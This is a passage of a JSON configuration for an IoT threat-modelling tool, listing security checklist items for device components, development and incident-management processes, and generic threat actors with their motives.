Hashing","ID":"ba8dc5f0-e1a9-4263-8179-747791b873ee","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Sensitive Information","ID":"157fd588-2ea2-4260-9a25-86bf8241b31c","Tooltip":"Does an authentication response contain information which requirement is not fulfilled (e.g. password/username is wrong)? ","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"9926788f-c85e-43ca-91e4-aa9c0f46656e","Name":"Error Handling","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Handles All Exceptions","ID":"897ef1fd-f1e7-4527-89e3-2cdaf2c8644a","Tooltip":"Can unhandled exceptions occur?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Sensitive Info","ID":"f7733c50-2529-459f-9397-8d06f231121c","Tooltip":"Do error messages reveal details about the internal state (e.g. stack information, path, passwords)?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"44545d3e-fa0a-44c7-a19e-8164dab646dc","Name":"Device Management","Description":"","ComponentTypeID":1,"Properties":[{"DisplayName":"Device Has Tamper Resistant Unique ID","ID":"08ee42e8-3525-4767-98e3-f7492f356d2f","Tooltip":"Is the device uniquely identifiable (the ID is factory-set and tamper resistant stored in hardware)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Secure Management Access","ID":"6962d897-bf88-4745-9f2c-a8aa9d981f93","Tooltip":"Is the access for device management secured (unique password/certificate, MFA, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"7e64d98b-ecbe-4921-9545-8b30d0f9bde8","Name":"User Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Unique User IDs","ID":"6391f8f2-eb04-4caf-b490-49c920315867","Tooltip":"Are users identified by a unique identifier? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Different Privileges","ID":"cdb65d33-946e-412e-838b-3075e928c4f0","Tooltip":"Is it possible to assign different privileges to users?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Stores Passwords Properly","ID":"984400a6-7bd6-4031-a40c-06f0499e0d86","Tooltip":"Are passwords stored properly (using a cryptographic hash function along with a unique unpredictable salt)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Removes User Data on Reset","ID":"e6ee6f25-6e52-4f43-93c4-7ef35eb97024","Tooltip":"Does a factory reset remove all user data/credentials stored on the device?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"02b94aae-efea-451e-a017-81be68db03d7","Name":"Log Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Complies to Data Protection Regulations","ID":"4006de15-8767-4a09-8678-84b8d6b50ae0","Tooltip":"Do all logged data comply with prevailing data protection regulations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Restricts Access","ID":"8e4b2af8-b023-4991-80f5-54ffa28cd616","Tooltip":"Is access to log files restricted to the minimum required rights to function properly?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements Log Rotation","ID":"d0532ce9-51a9-4bb1-84ae-c8c63ee78e7f","Tooltip":"Is there a maximum size for logs and is log rotating implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Evaluates Logs","ID":"364003cb-3e6c-470a-a6bf-e7a7c93e07fa","Tooltip":"Are logs regularly monitored and analyzed to extract valuable information and insight?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Stores Logs Separately","ID":"418fe90d-88fd-4066-9339-890501ea07f0","Tooltip":"Are logs stored in their own partition, separate from other system files?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Central Log Backup","ID":"bd32d10e-82d6-4e7f-9247-fe2753908e60","Tooltip":"Does the device securely send logs to a central repository? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Passwords","ID":"025e828e-d1a0-4487-9c56-09fd6941d4b9","Tooltip":"Does the device log passwords?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Authentication Attempts","ID":"c7d5fd7a-4007-480c-a34b-cb32fab17472","Tooltip":"Are authentication attempts logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Changes in User Session","ID":"a154298a-d410-4da4-921d-906165cd5329","Tooltip":"Are user login, logout, and inactivity logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Firmware Changes","ID":"91abf825-cfca-4386-b5d5-8262423b090d","Tooltip":"Are changes to the firmware logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs User Management Changes","ID":"1a582358-45c2-42e2-a21e-61206a4eda7e","Tooltip":"Are user management changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Privilege Change","ID":"c86b6500-99cb-46e3-948f-b67b69c9768d","Tooltip":"Are privilege changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Logs Configuration Changes","ID":"0bd863c2-5505-4226-9b28-bab9715c99d1","Tooltip":"Are configuration changes logged?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Warns User of Full Log File","ID":"95b793b3-b68f-4533-9dc0-4e7d414effe3","Tooltip":"Are users notified when the log file reaches its maximum size?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Time Synchronization","ID":"8643278b-1ab3-4359-9ab9-f3911bf336e6","Tooltip":"Does the system provide the ability to synchronize the system time?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","Name":"MQTT Client","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses TLS","ID":"6d7716ae-9870-46a1-9231-a713a0dcd5a0","Tooltip":"Are only messages on port 8883 sent (MQTT over TLS)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Client Authentication","ID":"de628891-642c-4b7c-b88b-abf7988721dc","Tooltip":"Is the client authenticated and authorized using its own X.509 certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","Name":"OPC UA","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"HasSecureModel","ID":"4338e868-4e3c-4473-ba27-6148e8b1fc0f","Tooltip":"Is the security mode \'Sign\' or \'SignAndEncrypt\'?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"AuthenticatesUsers","ID":"1e3a8fb8-4a34-44be-8168-996a7e0283f1","Tooltip":"Are all users authenticated (identifier \'anonymous\' is not allowed)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Strong Crypto Algorithms","ID":"3f4c724d-3d4d-4b6b-9252-ef43b4240d79","Tooltip":"Is a strong security policy chosen that uses strong cryptographic algorithms?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Certificates","ID":"34344cae-d072-4901-a7be-4084a2534b45","Tooltip":"Are only connections accepted that provide a trusted certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"fe464818-7cef-4aba-9d18-0bc2357ca56c","Name":"PROFINET","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"2673ba36-ece0-462b-b115-0edb2c17828f","Name":"Modbus TCP","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"ce3cdda1-0737-468e-83e7-ca20098551d1","Name":"Web Server","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[{"DisplayName":"Uses Secure Protocols","ID":"9ea829dc-59d5-437c-8d24-9908feac2941","Tooltip":"Does the sever use secure protocols?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Uses Secure TLS","ID":"aa99758d-30a6-4e0f-9d11-1d46c0f43d6c","Tooltip":"Does the server use at least TLS 1.2 and older versions of SSL/TLS are disabled?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Server Version Banner","ID":"6faf97a0-6039-4b7b-ba7c-6b9ef003ede3","Tooltip":"Has the server a version banner?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular Patches","ID":"defc6bcc-2bc9-457a-abab-666ec78d4f73","Tooltip":"Is the sever regular updated and patched?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Web Application Firewall","ID":"6f65b93f-53ad-424f-a81b-4777ad48ec97","Tooltip":"Does the system deploy a web application firewall (WAF)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is API Monitoring","ID":"b125fa52-c06e-4e54-88b5-5e9d3929f643","Tooltip":"Are all API calls monitored for potential API misuse?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Runs on Root","ID":"39de06c5-7cfc-4fb8-8a1f-22a8888cf4ed","Tooltip":"Is the service running with root privileges?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"a6659758-d5b9-47ab-961e-a77703652cf4","Name":"Mobile App API","Description":"","ComponentTypeID":1,"IsThirdParty":true,"Properties":[]},{"ID":"2ca79dc4-0a73-4fc2-859b-1b5701530183","Name":"User Application","Description":"","ComponentTypeID":1,"IsActive":false,"Properties":[{"DisplayName":"Follows Least Privilege Principal","ID":"03d7ff9f-bbdc-4938-974d-cd9766bdb8e0","Tooltip":"Does the application operate at the lowest privilege level that is possible, with access only to resources needed (least privilege principal)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Isolated","ID":"532fc4c6-b14f-4b9a-b033-f4aaf0d63e25","Tooltip":"Is the application isolated from others, e.g. using sandboxing techniques such as virtual machines, containerisation, or hardware mechansims?  ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Input","ID":"1c1a93cf-acce-4f57-a210-e0b5058f57b8","Tooltip":"Is all data input sanitized and validated before processing?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"2d746c06-a57d-41af-9712-f9d8059425eb","Name":"Debugging","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Improper Access Control","ID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Exposes Internal Assets","ID":"517b62dd-eea7-426e-82c6-2c458eed0aaf","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Unpublished Interface","ID":"311904f3-7898-4bab-ba74-e6024c704cd3","Tooltip":"Are the hidden interfaces that developers created with the intend to be not publicly available?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","Name":"Hardware Abstraction","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Has Hardware Feature Restriction","ID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Name":"Memory Management","Description":"","ComponentTypeID":1,"IsActive":true,"Properties":[{"DisplayName":"Allows Address Region Overlap","ID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Clears Data on State Transition","ID":"16ab50f4-dd94-43dd-8480-37cae5c61043","Tooltip":"","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"463570ce-8495-4b4b-97fe-abed4942059a","Name":"Key Management","Description":"https://cheatsheetseries.owasp.org/cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","Properties":[{"DisplayName":"Stores Keys in Security Module ","ID":"64bb2754-a187-47c8-aa93-e599f0a97a57","Tooltip":"Are keys stored in a cryptographic vault, such as a trusted platform module (TPM), secure element (SE), or hardware security module (HSM)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Key Used In Trusted Environment","ID":"b43ada71-51c6-4f5e-b310-a1735a41e602","Tooltip":"Are cryptographic operations (such as key access, encryption, and signing) executed in a trusted environment (e.g. separate module)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Encrypts Keys","ID":"b6c0efb3-7db3-4dd8-8c60-620027eefa3e","Tooltip":"Are keys encrypted using a key encryption key (KEK)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Verifies Certificate Chain","ID":"20b12b0e-4031-4eb3-ad39-f91489884490","Tooltip":"Is the entire certificate chain validated before trusting a certificate?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Certificate Update","ID":"e09bd987-fbf4-4f3d-afeb-033e5bdcb7f8","Tooltip":"Is there a secure and reliable way to update certificates?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Enables Certificate Revocation","ID":"c9d634b6-7eb8-4210-9e97-58e93a5c09a0","Tooltip":"Is it possible to revoke a certificate / check a certificate against a revocation list?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":1,"IsActive":true},{"ID":"aa2ca59f-4045-4cb4-a25d-b23c4b456be5","Name":"WebSocket","Description":"https://devcenter.heroku.com/articles/websocket-security\\nhttps://brightsec.com/blog/websocket-security-top-vulnerabilities/","Properties":[{"DisplayName":"Uses WSS","ID":"cb908fd2-f59c-4f56-ac91-bc1192df5af0","Tooltip":"Is the secure wss:// protocol used over the unsecure ws:// protocol?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Is Tunneled","ID":"0d2c8df9-271f-42e2-b3fe-cb74719ff39b","Tooltip":"Is the connection tunneled to any other service (e.g. a database)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Client Input","ID":"8cd86481-a82f-490d-8d62-2195981779e9","Tooltip":"Is client data validated before processing on the server?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Validates Server Data","ID":"92c3d3ef-aa2d-4920-978e-ff1755479308","Tooltip":"Is server data validated and parsed before processing on the client?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Implements Authentication","ID":"485ff476-0c99-41de-b90a-4fdd27730685","Tooltip":"Is authentication and authorization handled separately (e.g. ticket-based)? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Limits Connections","ID":"9616fd88-1e3d-4d72-9178-ad81d793a744","Tooltip":"Is the number of connections limited?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":1,"IsActive":false,"IsThirdParty":true}],"myComponentSWTypeGroups":[{"ID":"c91d3152-cf81-44d2-b65c-b9ab2cc0f8f9","Name":"Core","Description":"","myComponentTypeIDs":["551ef8ab-1707-4d4c-9845-c8dcc7515fe9","75752ec0-7fa9-41a9-a06a-edcf890ca569","ca502567-bafc-40f9-a5e4-8ce94780c3f6","9926788f-c85e-43ca-91e4-aa9c0f46656e","2d746c06-a57d-41af-9712-f9d8059425eb","6c83ccbc-ffbd-4bd6-b207-07386e3393c5","ea189855-6883-489f-a3d0-77d4ac51a6ef"],"ComponentTypeID":1},{"ID":"4845aa7b-55f5-44e5-9187-ac53964300d9","Name":"Base","Description":"","myComponentTypeIDs":["838f741c-120e-4b73-951a-d55a11d36ca4","f049724d-ed42-4c16-af4e-9bcacffc7f0b","44545d3e-fa0a-44c7-a19e-8164dab646dc","463570ce-8495-4b4b-97fe-abed4942059a","7e64d98b-ecbe-4921-9545-8b30d0f9bde8","02b94aae-efea-451e-a017-81be68db03d7"],"ComponentTypeID":1},{"ID":"af7ed765-9e95-4a90-8764-cdd33826003f","Name":"Connectivity","Description":"","myComponentTypeIDs":["693eb3c8-9d8a-42ce-91aa-0ac4c190d7dc","c80fa1ff-def0-49b3-ad47-0c9f56c21fe6","fe464818-7cef-4aba-9d18-0bc2357ca56c","2673ba36-ece0-462b-b115-0edb2c17828f","aa2ca59f-4045-4cb4-a25d-b23c4b456be5"],"ComponentTypeID":1},{"ID":"9a10995f-e765-487a-b357-51e22d7e5f6b","Name":"App","Description":"","myComponentTypeIDs":["ce3cdda1-0737-468e-83e7-ca20098551d1","a6659758-d5b9-47ab-961e-a77703652cf4","2ca79dc4-0a73-4fc2-859b-1b5701530183"],"ComponentTypeID":1}],"myComponentPTypes":[{"ID":"25032887-439e-4599-84bf-05d906641a0b","Name":"Incident Response","Description":"See IoT Security Foundation: Vulnerability Disclosure","ComponentTypeID":2,"IsActive":true,"Properties":[{"DisplayName":"Has Vulnerability Disclosure","ID":"dd2c4c41-45f0-4105-aea4-317943e2f435","Tooltip":"Does the manufacturer enable a coordinated vulnerability disclosure?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Bug Bounty Program","ID":"b4c47f35-bcd3-4b18-9b35-8a7f213dcca4","Tooltip":"Is there a bug bounty program?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Provide Timeline Info","ID":"e7d90cc4-822e-4aab-a161-c766cf13df22","Tooltip":"Is there information on the timelines for acknowledgement and resolution of reported issues?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Incident Response Team","ID":"263b5363-2c09-45dd-8ff8-1a430fb7e93a","Tooltip":"Is there a incident response team within the organization?","HasGetter":false,"Editable":true,"Type":"Check Box"}]},{"ID":"cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d","Name":"Update and Patch Management","Description":"","Properties":[{"DisplayName":"Has End of Support Date","ID":"ec622fb4-b851-4c4f-94dc-d5f5b1a6f85d","Tooltip":"Is there a publicly available date for the end of support?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Update Interval Information","ID":"53ceef04-26a6-46a6-834d-bb9c0df2a24d","Tooltip":"Is a rough update interval publicly available for customers?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Update Notification Process","ID":"7da73f3c-b3f6-4d35-ae19-c60ed655b14c","Tooltip":"If updates are not applied automatically: is there a process for notifying customers about a new update?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"8902950a-6c5e-426b-baa2-71794e74f720","Name":"Penetration Testing","Description":"","Properties":[{"DisplayName":"Has Regular Pentests","ID":"d4cb3498-4689-49f2-9f37-8bd45e62a972","Tooltip":"Are penetration tests regularly (at least annually) performed?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has External Audits","ID":"5f7c116c-e2a5-49af-bfd6-9c38541b6a77","Tooltip":"Are audits regularly performed by external institutes?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"8aa599b0-9ee2-474f-974b-bbefa09896bd","Name":"Incident Detection","Description":"","Properties":[{"DisplayName":"Has Reporting System","ID":"23943ca9-3df9-4d69-a414-6d8fef99d30c","Tooltip":"Is there a public vulnerability reporting system?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has /security Page","ID":"36e1de4b-5129-470f-b06d-208ef7610da8","Tooltip":"Does the website of the manufacturer use /security to provide security-related topics?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Security.txt","ID":"3affc4da-9a78-43ec-990b-75d20edbc410","Tooltip":"Does the website of the manufacturer provide a security.txt including all security-related sites and contact information?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Contact Email Address","ID":"d94f2535-73f9-4c2d-aef1-57b1c9daaa5c","Tooltip":"Does the manufacturer provide an email account for security related topics?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Public Policy","ID":"0c7bdef9-6b56-42db-a22b-a460b08bb27d","Tooltip":"Is there are publicly available vulnerability disclosure policy?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has PGP Key","ID":"61d4b9c9-19a9-431e-b114-f2c04b48846b","Tooltip":"Does the manufacturer provide a PGP on their website for secure communication?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"44fd3f80-7e55-41af-b452-283556dd1894","Name":"Privacy Considerations","Description":"","Properties":[{"DisplayName":"Has PIA","ID":"8f4a0dd3-2083-42eb-89bd-48480a082342","Tooltip":"Is a privacy impact assessment conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular PIA Update","ID":"f3d756ae-7451-4738-986c-0e15d22cb2b2","Tooltip":"Is the privacy impact assessment regularly updated (e.g. annually)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Privacy Measures","ID":"2a4c8bb7-bd16-4eee-847f-25090eac2d7e","Tooltip":"Are appropriate technical and operational measures (e. g. data pseudoymisation, data minimisation) implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Compliant with Law","ID":"1bd8c924-5f59-42db-a9b2-a4527c46adf2","Tooltip":"Does the system comply with all privacy laws that govern user control over their personal data?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Protects User Rights","ID":"e79dc2a3-1af9-4a37-b649-9db68eacfc9f","Tooltip":"Does the system implement appropriate technical and operational measures for the protection of users rights and freedoms (e. g. transparent information, right of access, right to erasure)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Sufficient User Awareness","ID":"2dd7688c-eddf-4cfa-a496-8c1a46963c89","Tooltip":"Are users sufficiently aware what personal data is being exposed to the manufacturer, operator, and other partner organisations?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Opt-In Mechansim","ID":"d9b40dd2-e5eb-485d-9cf5-db2ac441c899","Tooltip":"Does the system implement an opt-int mechanism to get explicit user consent for personal data processing?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"be1f1524-fd62-4957-a08d-844b070dbb00","Name":"Safety Impact Assessment","Description":"Evaluate the safety impacts of an IoT system, log all safety risks, prioritize the risks, and implement mitigations for each risk. Incorporate device and environmental controls to enforce safety requirements, as necessary.","Properties":[{"DisplayName":"Has SIA","ID":"a1e7923f-848d-4532-b967-700925af1a77","Tooltip":"Is a safety impact assessment conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Fault Tree Analysis","ID":"d0e4fa19-2b29-48b3-b81b-2be909af26d8","Tooltip":"Is a fault tree analysis conducted?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"23a8870f-e7f4-4e07-80be-8cb890f509e8","Name":"Identity and Access Management","Description":"","Properties":[{"DisplayName":"Has Account Management","ID":"524e227d-483e-45ae-b002-3041d15fe7e9","Tooltip":"Is there a regular audit of the account management (user, administrator, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Certificate-based Authentication","ID":"330a4f44-1471-460d-889f-4f33a3b8ce72","Tooltip":"Is certificate-based authentication used to access the system?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"34f3948e-4d7f-4f0b-a86b-e649c427bc8e","Name":"Certificate Management","Description":"","Properties":[{"DisplayName":"Uses Short-dated Certificates ","ID":"40c05808-37a1-4394-a9d5-8491b55c3a9b","Tooltip":"Is the lifetime of operational certificates no longer than 3 years?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Revocation Process","ID":"083e93ef-da95-4064-a698-6fbd5cf997f5","Tooltip":"Is there a process for certificate revocation?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Management Policy","ID":"46d35b81-19e3-404e-9fe2-af5088971ffe","Tooltip":"Is there a certificate management policy (creation, processing, storage, etc.)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Automated Renewal Process","ID":"0c0d40fd-7f0a-412d-ae80-efce58906308","Tooltip":"Is there an automated process to renew certificates?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1","Name":"Supply Chain Risk Management","Description":"","Properties":[{"DisplayName":"Has SCRM Program","ID":"7e3faca4-9b7a-4f8e-8fbe-cb461ca6870f","Tooltip":"Is there a established supply chain risk management program?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Third Party Monitoring","ID":"2614fc88-29cb-4d84-9902-5f7ca7f98410","Tooltip":"Are third party components (hardware, software) tracked, monitored, and regularly updated?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true},{"ID":"ea8af3ca-0055-4d82-88af-711b356aec74","Name":"Secure Development","Description":"","Properties":[{"DisplayName":"Has SDL Program","ID":"e1cdca4d-c2a2-48a1-be0e-93af41cd458c","Tooltip":"Is a Secure Development Plan (SDL) implemented (e.g. based on ISO/IEC 27034)?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Reg. Compliance","ID":"9db73879-4ec7-46ae-a8d9-1b555aac6954","Tooltip":"Do you have a group and organization responsible for regulatory compliance of security, privacy and data protection, and safety? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Security Compliance","ID":"f3a7b4b7-2ff8-45e8-be0e-321f8d9304a1","Tooltip":"Do you have a group responsible for security compliance and quality control?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Responsible Person For Auditing","ID":"8fda48d4-746b-4915-b0d2-55c9b68fbd99","Tooltip":"Do you have a responsible group for auditing?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Includes Testing","ID":"e6f155e1-51e1-4297-80d9-a6a3beef3657","Tooltip":"Does your SDL program include internal functional and security testing of the system?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Employee Training","ID":"976c15a1-9170-4a2b-a41c-f1dfb4688b1e","Tooltip":"Is there a holistic security training and awareness program for employees?","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Regular Employee Training","ID":"f2e2201c-bd33-4dbd-a8ca-1f3a6d16eb9f","Tooltip":"Is there a continuous, regular and frequently security training for employees? ","HasGetter":false,"Editable":true,"Type":"Check Box"},{"DisplayName":"Has Secure Coding Guidelines","ID":"60fadd09-661b-494a-bcac-f0a652172a50","Tooltip":"Are secure coding guidelines implemented?","HasGetter":false,"Editable":true,"Type":"Check Box"}],"ComponentTypeID":2,"IsActive":true}],"myComponentPTypeGroups":[{"ID":"152dc4f8-0f67-4967-bb95-0994a48082f3","Name":"Design & Implementation","Description":"","myComponentTypeIDs":["ea8af3ca-0055-4d82-88af-711b356aec74","44fd3f80-7e55-41af-b452-283556dd1894","be1f1524-fd62-4957-a08d-844b070dbb00","2c884e0a-ab3c-43f7-95c7-f4a320e8bbe1"],"ComponentTypeID":2},{"ID":"d6257d70-4fbd-41a5-92d2-7dd7be9e447c","Name":"Security Management","Description":"","myComponentTypeIDs":["23a8870f-e7f4-4e07-80be-8cb890f509e8","34f3948e-4d7f-4f0b-a86b-e649c427bc8e"],"ComponentTypeID":2},{"ID":"a867f0e6-c920-4b9f-a6a9-0947780695b0","Name":"Update Management","Description":"","myComponentTypeIDs":["cdcdd88c-7ec2-4b18-8d72-bcb0e402ca5d"],"ComponentTypeID":2},{"ID":"55e4ff75-c735-40ef-a97d-031f4df2d4ec","Name":"Incident Management","Description":"","myComponentTypeIDs":["8aa599b0-9ee2-474f-974b-bbefa09896bd","25032887-439e-4599-84bf-05d906641a0b"],"ComponentTypeID":2},{"ID":"534fe08c-c722-40b6-b7d6-ed5deee2eebc","Name":"Security Verification","Description":"","myComponentTypeIDs":["8902950a-6c5e-426b-baa2-71794e74f720"],"ComponentTypeID":2}],"threatActors":[{"ID":"09ec9afa-906e-4383-be80-47de5c87bd4d","Name":"Cyber criminals","Description":"","Likelihood":2,"Motive":["Blackmail the victim to get money"],"Capabilities":[]},{"ID":"90cc276e-cfc5-4e37-afa0-b14f96f2d231","Name":"State-sponsored actors","Description":"","Likelihood":2,"Motive":["Citizen espionage","Disruption of critical infrastructures"],"Capabilities":[]},{"ID":"b5ee94b3-703f-4cdd-92bd-64bd73975cb8","Name":"Competitors","Description":"","Likelihood":2,"Motive":["Know-how theft"],"Capabilities":[]},{"ID":"127b2c1d-e8c5-4225-a03f-7169cceab3a9","Name":"Insiders / employees","Description":"","Likelihood":2,"Motive":["Financial gain","Anger"],"Capabilities":[]},{"ID":"445bb063-8765-4224-8c44-86b8c38d16e0","Name":"Hacktivists","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]},{"ID":"d8135bb6-9891-4038-9fe8-707c9426b42b","Name":"Terrorists","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]},{"ID":"b334caef-05f2-417f-a664-6a56ea83657d","Name":"Script kiddies","Description":"","Likelihood":2,"Motive":[],"Capabilities":[]}],"threatCategoryGroups":[{"ID":"9d6172db-e842-48e9-bb18-6137a6ae60ee","Name":"Nefarious Activity / Abuse / 